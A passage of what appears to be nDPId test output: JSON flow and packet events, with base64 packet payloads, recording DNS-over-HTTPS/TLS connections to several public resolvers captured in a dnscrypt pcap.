RMXnx81+ULomH3\/REIZL8cJwn+2P90vZcz0nqHAdHNiNOVCuiRaWyF4Wvtc2sEcGUjXGdVCvWK5\/TAJXm0J2jHwKksw9UwwmgBH2L6bGrwRyHCJ2cw2hrKj3bjjl++Bt52RqDx0PVra\/rDo\/D9uT1POR1MaM\/x6LwSGCpAydntCKtia54FgA3Uhl\/nC30fr8SinEx99ZlxNZcUwMiSNiiKzXEm9FsWYC\/mMQzJV1i0LpOAR5NQqTWYZcgE0\/OveI8ff5IAowgJ+Hh\/4cxgYyfxncxnZuou7BNW6vK67qt4eHbNzMxkGd+MYfZPjpdNHgl0+9xwS+qPx5Geun7Q7WO597TYhUFRG65T4qW2mYIUwL1aivadFz0v3ufWodzPjitCdjrW\/CjxtgUeuQtpa9t6KowJyhDmylZ7M\/A\/0JA+G7fTgIe1TbG0xXzz8kDHjrceHEBB3fFYvU5PKsGoQIH7p5mVRtoWylDhNC8a99xzxvR321Mh05C\/rxybySPX5rS74BeJ3VVwh0u5wrKR0eaWETinu\/8G\/XeeDanjx9v3DJgHY+pmOJ6EfJAfykxOYeiP4203LV9khy85bpP5JKwpS2QMRmDFSBHdsHpJDRK\/DdvVbwNlWzfHpmLZWIHourYiO61Z3oUmy4jI6OPDHv5EeJ3GNgfdU2yVIDdXq\/feGnWjZ1ojjDmfZzX6Ga4usOS7QhUW\/qRlMWXjj0hWmVMuLgwxGhGIXFKHCnNkMvxhSfzVsE\/fi2RWPnsN8Y42mvONkcXcfz9fwVNPYZJ6vnJUdC38oFYuyxT6LU0tUbEwaY\/ADwFl01XGl4ZRLV0i0vW1o2ORCGan1S8ji0kjp1PF5SgkDszY7oyvcHWR2j4C6IQfUNuW9sz\/BQ14X4v9\/xe+MBb1f30kVxu3I5Z5sCgwSJyclzM\/f\/w7+dPBCbaDnko\/4n8h05Ca12TAlFGzHkKPnx1A7nHgTXQTbJZXVUHU1yc6wwHk03G82kbZx+9FOzA9UNN9spmOc1YFepJxRmeK9M4veJGaNpfRVGQg2bta2RYDoDQK6oksPTzxPlWmkrVyuPbKNRQte57AnTO0NVTFr+bzDGOQFV5KuQbIF5hun\/LyUUKo6IgZruMikB6RR4IQ2uwGAocW75mLZis5bpZE122ilxmqMjkobAkDhx94FariZ5KfD\/Dr73ksFu0dQOrbgEoWdEDM1QJlwefbcBwmDPAZLTV06HvqQLrQ3a1J+ItnjBF\/3OcuGO6PNfCT4mXVZw\/XCZX37Gyj2evv5QnGXPK1+Sz2Q5HIbp4HDap\/+BBCzFRfzqg0GnGl3jD7AOmoAQDjzGfNFmTCT3IVA+v7COJSJTgvupRfK8IGZ6AChkDUM1D7TO\/gBXEdODTbF1kgj7tfbZE7QwEaK830652BNyQJGc4RRNwEbSlnyim1OuU6TMP1kn575di9kDVNjDx2AGxl9r8\/Snh1yll75FKAvMdPXTtCkrIgF4ok5dKpFUBKte07uQ2NnmiDy8tXArJDdFY7b0nRfBceQeXxY+261VTVS3qQ8BgkT+EbOmZjAyNz47hC\/w2WDlet\/NE9emDu\/WKqWCIy3yA1831JCwRHJDtJVAd9ss2dknfVJUGkTZeyaziCfo\/hUPLXsYyHku+nVEJbqNRpQOhPnb2jeGQfmWpk2og0U8kSEHESILcSFehIwO8Vb02doDEPxmjiluOoiNj8DTjVwesJzOCze3nnZ5thxuSrDhczvTCxNeMi2LoAi6IHJwv6yKmP3cCkUEWe4z9AbWZf4hUxJmNVNy5Q7vVV994JHX8omBPWK038vtH5PW7a2OYFKIdjI2Yz6SzJZ+OqlYbYFCmqa0c1eGXVB\/8TqdStQuai1fU0TE\/mTy2FB8c7NSR\/VKsBC8I6sIjqPn9nPpsLX4Aa5DuM2tqeuJozI3MGtgrFFDrWyvjyt1h\/ISepVOPB\/T+JPzE5fwBCeACmNByH9IK2FVF9+wHSMnDH3Rdcgq4pgz6QU4cUluqyfpyzHlgAE9GfUnMqJiECiCuREVqACQxSZ7sa2wTa0di8dAGzoqN4wIPrx\/temySP8MWqmu\/laj2zLNnRd172onl\/m0hR+U8Hv2MACSDGStNO4O5BZwFSeic72yCVIqhVfsgHETqQg8hlMMT17c\/Uj9ao0O73iw5Wjk\/7cB+lK3LZb6byC2wyyD+pd3TtLmM3qgg8MtUgLGKfhsIhfUQTp\/XqEKFU5NCsHHu5VZEHHRdrJOXdW\/pdNLP05EW9nsN0M81ZPdlsv4so8uNoBrTLmnVUIf8Xa\/+SxfhPXt5a7K9AzUWWAjnEVKewBClu712Lm3rXDDG8akrRqhMVator6IljVQJj5vEGH7cBag89maUZ4A+3FglL2gnFPZqquwNwRZ\/3ZI\/mK3YEJZaZg1I0ttRdpLCWXjXUB\/Ipx3mzzk088GloS95doYpwADCEaNRAt8ezUks5kQLYjOijiV4kNTL4MxFeNVH8TtI\/eKEzXoMQeONGsl0ElE1PvGiv8WDRmkmPVWFKUutMd8AsdJvQyoKp4+YBesIZnfv5oqwoZYzY6xW0eyUs26A2QPqxn4XpA6GW55Ed1urfGB\/LM4y6m1PQnCV91nOX\/rijw0hyc632Jc4nJK2Fy84ObW9S4LluL+dKVbnJwm07LENwwbm524\/mub+gizMq1y+sluBrCe\/URmcV1qijGxp4HTb+RHA1oHAF\/FwkQx5VCNkGEMN0VqUf0AhXzQ7n792nY1bKlqBB5bwOJqseO8f5u7xOkvAJgvo15UUiFg3Fs2KF6ThIQ+YMon+lnrc8ic+qxARfjEb0cUl2zxPZdn9Pk3JDZvc3FGGanhfOsuSbbIvGq9hrnu1dWnHdMIQG0tNqt5ibv87oqeA73DYcjrRkRvnmr+NgiyzjsYvnZnavg2SVhWLOyeYi6z6452amFOWjGib+uO3a6rOPS\/dTZTQ6OPLUcWKxkXHJYeC+Yo0LWKJwuFiHg7pi2FgUOZ1c24VzSrIDORj9fOesNSZQSAFwMDARkW8VkjAKLO1iVO3Z32JB1I03p1Xf19NsjcozTvJTA7tEC3r\/iX403MlEBRFX3aGlXo2cYSoUTLuYUpZWzaPV43zoko1HlYoj3YCwOBNXEdg1n9iG9nfj9q6\/IWDsPyy9SboWjcQJVD0zE5qJ8DwGucAIvsQ7D0zCtLvnxWjjpqSDdb9tOBYDpaZBZU8KCwR8LHjkKDpJkQyCpohil6861j3biEmWgZIX0h067Jmu+\/GI2jSqgEcF0VdDgb777Odt1jnDUv6rPpys\/KpOKpGwd1sOOD1atUuwZ2VWxJpoQFOVZofLGtGDAGLonrwSCzj9\/ObIFITDrXAwr6TE8\/SO2citlABmWDWJNFMQq1IU16fmzPW9wZ2jhYPxcDAwA1KFs5Si96rO1Ec9S06xPPSvxONjZOZ1eDJyi5V7B3adcTvi5GDWF42J9ne7Y2tNbnJdDWBMM="} +01090{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":236,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348407,"flow_last_seen":946739348519,"flow_idle_time":7560000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3098,"flow_tot_l4_payload_len":3384,"flow_avg_l4_payload_len":1692,"midstream":1,"thread_ts_msec":946739348519,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":36012,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns2.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00547{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":946739348521,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739348521,"pkt":"REREREREZmZmZmZmCABFAABoD1xAAL0GdBEKAAABlTjkLYysAcV+b2UT8dMaQ1AYAfU6fQAAFAMDAAEBFwMDADViidEmWrIRj1bupCYNTHJ+IR+sbSf6KT90A8qW52RQBURyQL9vFT6E9CFjlI93BJu2cr+zKg=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00852{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":946739348961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739348961,"pkt":"REREREREZmZmZmZmCABFAAFIPztAAL0G074KAAABLZm7YJSCAbsJfFJ\/n27j2lAYAfaq8AAAFgMBARsBAAEXAwMZV\/YJsl1KDGHp6vinUuSzBgwYUj7HikeN2yT\/6PXJXSCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zc2UuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AILqIx\/2aPwjQ+1CtVREnVkbTOyfaXxjQI4MYF1wNoZlj"} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":252,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348961,"flow_last_seen":946739348961,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739348961,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":946739349012,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739349012,"pkt":"ZmZmZmZmRERERERECABFAAuAVvpAADYGOMgtmbtgCgAAAQG7lIKfbuPaCXxTn1AQAIO1KAAAFgMDAHoCAAB2AwPVEzRRR6mT0E92uybAnGbGZWeWVD\/m1\/eNOhfsedWm3iCCG8AdBIamvVFUtiPCGd7atl\/XGLRDF4fN5wiY+j2o\/hMBAAAuADMAJAAdACAZ+iIImd19O1rP7adwYQe9xC\/+1jN6jL9eBLofHG6SbQArAAIDBBQDAwABARcDAwtedm5F60tr1KSpSWgXMdmmX3Ys4sUEWudZbc\/GVmqkUsaepFDQQ8mcPIjegsJEHlTqywqGyBqt0c8EFI9PK3y9wMc\/+3ozr1s1L0Jd42MTaMhOndcbb8aYEnSYi\/zIVpLn6qdOkfyxUEfDDwQC7tdpz8rWkLOD8s1Gc\/+GapP01LuZUSoxJKMEPFivq1rS7ax5uSaTQJul+x0Q1A7WKBQI96lxNlKhu8S\/F6aiQdLb9bng9LygmgdlJ0IMNTAzSle754kwT44x6hxHdY+dgL3FfpB162mfDfNtflZ3mHhPTnkpYtlwwqsdseLzRBUZP3Q4Ja18aDfnLKv6lwZqUkYqVbKbxYZxo1iV+7HgYRo00AC9h97+\/fjdDvQp1\/ZlgGZVor6fI\/2UbNyKd+CKXq\/WxiWd3cfOC5mfsohQgZfh0mCkf9dr3uz3ujKCV4y2skvjk\/nvMYWaCk8YYJ09fpkBhHkvDLX34BQkxdq8SFFlf9KC0xLeicU3h\/prF3BxKbFcEuJVsTQ1IwCvvKPttu9bXK5Pot+r5ctGacxaL2PbnIguGLNO3oXuqP1Q9c+9bIOgs3SrVqvTzY6u7z71LwLT4lIRUT1tdFuzNBsI3uP36b\/9IAg3kdqQ6B86AhSq6s9YI9cVyIl6Ij\/v4hTBVX3z6+HeVN1ZOCnsTQ5pzdsr1wh7Urw2Dq8ujiDkOD+Fou6dMOYoID0SKEwKKw1eszHLhxLaCFy\/r3d7Go4MVMtt3WT79fbDbeLxIVt3hgCghutkKtcuHd5chD4oLWELh6tM9hPl+4nCK4m\/+O5cbKg6OL6jCTY\/gO0DykmoFGAjlffWT5qFPKGIHd1y6jfLFBTeg895J4XJsRYeS8WWpPvi7T\/OrrEOEoSups8MYg4y47m6jBSiviaU3Egrqb9OmbARusmAkBOc+b7sPEV3vJ7rmbEmSmp9es6Ma1hTLKZ1zLv5y87EpErdv2GmabDERgys3rQli1zICByjjT3wKTtOmnCFVus\/kEZ20ZKIT3R1SBoRFrSMK3NkxEq+liNvGGcf+EHNQ14qDPBLs0m+Amz59cCkIeFxK62ZDg\/D8+8JoEQZlyE9AWaFti+8vDVxBObTHdc9i3Kw7ewteJw63QBC9EWl8n8clagy9wb+UFjl1FNsicAfIiO1Xs\/Zye+Z2EVvEt6aOGsYYXUIiuSHHHy+OTANd5q6FtSmxH5d29V\/RRYtUF+RFNqvu7jCJbpfY4CMi\/uFQpCXgIsM\/FuZw9ietB43gXYBJPigmUjQOJrnl2aOEVZN25twSZkyFkDyfGhTbcdXECqNFF8TnC98sE4z4cSyaAj5eIgD8KWiILJX2yoi+dB+VLGxM9ljCfyywhEqQD9FxwMPenX20RdEq43Qg2oM44SbTOcaPyRK5R1+UoArEareBxTtwbIj1\/gYPRWTkZ8pK7ELTpeDzq5dz0ptJVwSUIH0JdKkVE3RFHc7LCdWysSVUeFYgHXl28Deq1y2qizxSTQTQGj788zPkj9nRqwsew3ffxErP0pR2erOmxzmRPzUcbJ79H2yupuK1CFndSabVcPzkp0n+2KlKx3Rn8tyf\/hn5qm64LAaVaGFpUoNBQQlUEAUYg9kdMVxRV9nD92+mrKa+2JReRncweAA5LhgzrfrEPwyc1B\/FBpBxwIyV7Xy5RQehy\/n+t2tqgDOZsROSPZV\/c502uShsqQ80dFUM5RKxh0mzHQFM0OK4kAUJhq4wyFBHR892ibgw3EufqDFUX7y2fDW3v9sHJ0PjEBQf0Z+LPQlMJXmUS7wgfHtNIgpjboq9\/XXfFayEzII5Ncg7bWrTiyo4JZFWiVHcfds+TlAJ90V8nR81jNjJjiPpWGiw\/wBoLReBkDgcemdC73ykLweu4Hz14TsLOSuTZsu5EZr2HV10q+61hH6ogeRQcst3XaFzwE6kceLYfEcwH6tnp0hMB9x62cNInT6JQ8Ps6Dsa1MRUtnCTsYL1E0KIBY7R9nY7dSZJpv6\/qCWpPnVEfxATo177u2nsXiV3PW6LNV3vcyinTzbbKWNsqHSX\/Rxrwf+OdHXgpeBX43CwbB+Rl\/n0BchEVnzKV702Gf9HUv7cdBb0q\/i8hYFIFBzZttYWXxvMMCuX5vFFfZ+rdfdvsqESgmVU60GNMEWlpOcj4wiK5O4Sufp7t63lXuXFEGAyK\/zCX6bTsoTK5InJmYeoxH7z6vro\/3e6Rs6NXLtea8yb94qYkPEVBEqGEipZDsyb\/R\/lWwE43D7Aub6g9hkVbl53hLJGZnLMYjNGkky7jnCfZMKDiaQ3bMKv84lVUSDkp3sK9qeuBF1mmZVLhv9HAxir3SYBNQzWsBGcCUpO9xkV8FP0kj\/iTW\/FfLKk\/DKd+BUjaxMV2uhSSQCmVokip5q8tl9J4DEAniFz7fyP2MXZu9ul4s+9NyHUnr96E7oyJz9targa6lIbTNrabDpef+RQ95Jg3dEACMFcNChtfiB\/b3jxW+VTLzdeEUKMhmN9RiB66l3ilE2UeLuKgX3mDdaXzGma9QHxu929MG9uV3gmQHGDy5TCH2vSSxC6z2\/OmzDacBVelfY5Epw7lZBVVGZZnkHXtDZ9aRkPwQ5ycPlis7xyXgrmjnzVXCU2sPi4g8aIZETiD58CL1o5eQFVuuBNN+YXqwNw72pWFPr7n1hEhwv6Vw12CTiC6plOVTlmWo7Hq2\/pHWhiu+RR5lh+vtYdVwTRC30+fnyRct1ka9vbNMqvCrrwxYa5D5R79sdMZcHtogzlIhlvBA\/hEtCrwDCOTsOVV\/YHdG3yKWN4O6RFwnZZifYo9t6777XaaqBBnRbmAIh24x\/s0cQdV+c5CkmqhwnyVXuFfH9t0XQ1553XL2pziV2ZWgjNschuXZ58zhktYtAMF0VjgYyEW7jDxhCpc\/J+cRaztT52A0ytvkRgmQaVyJn+aLdW9sCq3AlQ8gfIfMUsOa4qrrfYi\/W6wC7p\/JpUVApLzH2mKuhH3cCajbIykaOD4hdj7uAYv5ROV\/V+1+PXMG5ia\/9hbHOgDJFO9d9IqY7KSn3C+1mBqumfNrcdhFQFiTH43iJKL7gLi6km2zN5cYKZjrmjbjv3JkWSUwYRpPDfBjgX5JiTKnp6do79w4bx6CpetzdKmLMsuX1smdlFu3kujpvbqv6a1KH6F4pTm1MQ5RJmmfgdquxg6OsIIvP\/kEDn+LVg8ZMm87yYyquFkOWwe1Uj\/Vi3kL4fPIR5niD5XVoEWohLwDdVCqKts+2P1GYyEHqQAMrqWmQegZl\/LhTQw4INPlPDFEm0yb+KBOh00ktbHzCM3CFPGnzYO3alldd67nq954eKLkUOGB9MeSY7cUwdbulO4dr11zq3CmOecqOMxOt2f\/VIopIebzlUenef+vRdxbO4ewVSqUhsy+yoPWXBOpZPgLhhY3LxBP7ooDeCCIO0lcZB\/CBSyUEgiFK4lZ3kAGz8uFt3A\/vRHHEykEvXspKCwmakvQLGtne7shF+m0j\/3K2vxEjTMcnD1pU47tDCPXW32n5d+GKj1kQXvMBCTdCNuO1i0NSTDkuKc7j5+f6O6RyusC0fFzTP7MVdbXFBb1omPMQEuUSj0+hj0rK73sjeV5xq8OVFpFoURjJ2NwQsCAu\/jAm112150nTKknyPg+N6HqbvoOC0Wpkh7IwnBnV+fSTZjZ4AEkEeoKm"} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":253,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739348961,"flow_last_seen":946739349012,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739349012,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":38018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnsse.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":946739349015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739349015,"pkt":"ZmZmZmZmRERERERECABFAAC4VvxAADYGQ44tmbtgCgAAAQG7lIKfbu8yCXxTn1AYAIOAngAAUbudk7Sx467B78RwxwixN7WbszxDSJth5tiFKuiBrGoB9KFJtYBVt1C9rFJk5PyiCKlQsUVoHGHAH28fXEOq226wLx4N\/Z5eAHXlqMB6V1mSenxLPr5ItjgHCvxui0hIr8CHs4BD\/dcyFi\/lJAfYyCLIMg195o3ptTftZf8UL\/yW+5j1eIJyx2wYxG1Bmojg"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":946739354159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739354159,"pkt":"REREREREZmZmZmZmCABFAAFFsX5AAL0GP4sKAAABuetRAa5gAbtwXMMeYngARlAYAfbM4AAAFgMBARgBAAEUAwPEqi+8SizamcFZuiOMoqnZy7ZEtN03UH+nij+VYBL3GiAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3AAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPZG9oLmRuc2xpZnkuY29tAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIAlFpvTRrkboC35Gi6Kti1ZQzFT3L63Tg7Ad2VS1Z0Nh"} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":266,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739354159,"flow_last_seen":946739354159,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739354159,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.235.81.1","src_port":44640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.dnslify.com","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":946739354179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3168,"pkt_l4_len":3134,"thread_ts_msec":946739354179,"pkt":"ZmZmZmZmRERERERECABFAAxSLpJAADQGQGu561EBCgAAAQG7rmBieABGcFzEO1AYA+rX7QAAFgMDAHoCAAB2AwNebHWZixx0UeVpRBPFfxfOwpvxbfyV+ENeQi\/Un6YmQyAFdLPwuVYC1BfptVDzpRdMmd95Dbs0SjTzk4T9Cfoa3BMCAAAuACsAAgMEADMAJAAdACB1L93FSUikFZRCKYl+OoNXGHhZBDYuCiNIjz\/6VCChXhQDAwABARcDAwAgdZlJOwY6+pChCwvT27tLGZnet+yerzqND\/r13r3OLdQXAwMKE5aV9MRHEDXFawxN2Z6ZXTlxr30g5cib8A44fkQ64oQQPk\/j2rM6co+1b6nblkLeVstFbtdteXwKa840eY9TBhZcpregM8Gpq1oOWaP3aNoy3x0m7PtgdMXWTRJ7rBzMj95YpQgnRNENvlH3xRXTNJuz0OfawrfLZMK40dTY8qdEtSvVWaOv58OBFTZzds8x7Jv0lUMqTicPkVrWkLGPasMnh+a2IVbs4dzr6AhsFrB+RZ1Cwi3B7S6zzr3HKx3FQGuVtHh19izb6w3PsdZ173iclTsS5Bteswb+0EdgltfMU7tCCWlZhlMw5cbiqzX6GLMdzRL4kMNW6gZ94dTc92SBIwy+nEoGbWZhqTeDuHiAUARf+gliy5YoFjW\/PRAypf5PMRtEZClIDkjH3prUoCFGtLR5uf4Ro0aKo3ih\/KCyAGbVEIvG4bDrcfRxO0cIiVz1g0D8AUPbTDsJO+EPspEYZgIriHIBYFx\/k\/flIHH3EjcpqIe+X8XzMf\/XqWL46qAhN1cBUZXyVc3ZIhpeJ7ZcaAbPdH2pnTMTM+2Go4igirnaKWq3AflEDkSSdueX+UQOyAZUkd6Z\/x1Mwq9Tb7hXL6vtOYcRcpywMzYkakngWETbQss0CojZbN6WAPS\/E+Yya6CgGI5Mt3dulPgu8jNdumumeB1P2glp9qwQHuvHZ1QS+cPtS5x1raYCp7T5sLegZ7EBanNjOEnVAU4IhPuW0ciFUM9Mj\/BzgDWE\/hUdNhPhhQjiaUBq7VyAXKWvyO4Dx2Fel0gu0u32uA\/SHIYv4dBAj17ghhBMv+sGNC8NMtNWhv9aqIp0FgaNgTJ0u6ZahzAQoaba8gKEvhS9MXrxWiCXAHjt1VsuslTiTWmDXRn19O8C7v9DYdY\/x+ZHYaRltrJ+iDZDtT011nG9MjUMy2gT88psevKL0b5pLEr8mJZKye0N3pZbPCi7mofLMsInUgCJYAIJe6z94EV17S9g5MdytiaRjgrDRHDrubquER\/+3IoTeZlSES8Dx7zlXZ1xB0O+hR5nXJGyIskMCiVwzAersZ9n8hiUAXpNADMi79ZOaHWxepo2ogdjtLk6L5RJOzsW\/4O9s\/bE+P+1smYJ8Xz\/vrKCk0smpZMpgO1UV8s8gCIdy3Fy602DcQY72cCEk\/bea7v72CbMggpz6myeQuHNx9T5ZrAHxOyDqp4pkMAhTfD0dC3xg5zkOkSQr5pJx6ievuDl8+wenRgTssVF8J1H1XRwU56YwKhMsgqTn8eD+cywTh5zCo9dNvl9ZfHWmV3Mdg4aJz1dYzmdkUhSu46Md5G4HmOnLwI\/XQbyhHcZ2WUU9mvD9BvjP9kn2RjUXcRT+d\/cwjt2Esxb2ENHpq2bs5raN\/CIbWH\/kUQRUUCpYL9CdmiBZpRtJPrOXy6iWAKofUme88d2tr7pTpEzcTLRU5BoYhPgOVQbcXw1q3yaTUVQB4Wvp1Zu7ruywhz7ujDaUupe4ypGeBHoMNq\/GonbnedBdKUd5q1Hau\/cYgTRejjU\/rutBsmd1TsWFTtw4Narsizl07q94yxV1+nrTG1gDq+RefJI3JM3SA8ccXZmrC6\/9FsgFjt+2cDWt4JB10cFksHu2\/ml\/dASyc2jx2disClcngjvd0YpBOF1xYxILWWqUHc2SCZLZ2Aroa1pMW21jKFGB4Ar1xpSSuVVcPsSSozoKj4\/j0FvDgtwJoY1rK5ezs7yUOh0iG7\/TmlCa9VwcqKlbka3ucK+EV23eB8BAhdfkU1ZRvrzop+h56cTHnAqdzA+huEFkYic20FxEaceaf8SUoyM1\/uxur0377YEwqxCUCLmkpdjf2hKaG2o6w6dX9vCExiNhM2Jlol1IlMb4fWmsojPIiIMoMr4vCBzw+JJJUMfUwOy6sleF+nP5muuQ5rVTMwbb+OCuGE2jDpUYai822DbFN3NNQkq3i2+StVf9WCISeMMwfPk+unXE38SgIx+97\/gooknQY70IX3TsgQKFcc1SEcM6rgwk5pR4rwHfer1xQNsM1RKZGf8xeZa+ag2yg\/IxDT4LymayHchHxdaigJz4AcxjPrNuXaoi2s3E1xPh2H1clb\/ZJJwrzY7BZjc1TQovWjOw6wm8GHMHRYPWaLpFhaLJX6iixp0BBfYBFzNmIvcsaGPhpGQIWG8LNHl1vR+XYpcJzMWemerQw5\/TiIwzhe4xLQ3Ee69tOX2fKhT1GAV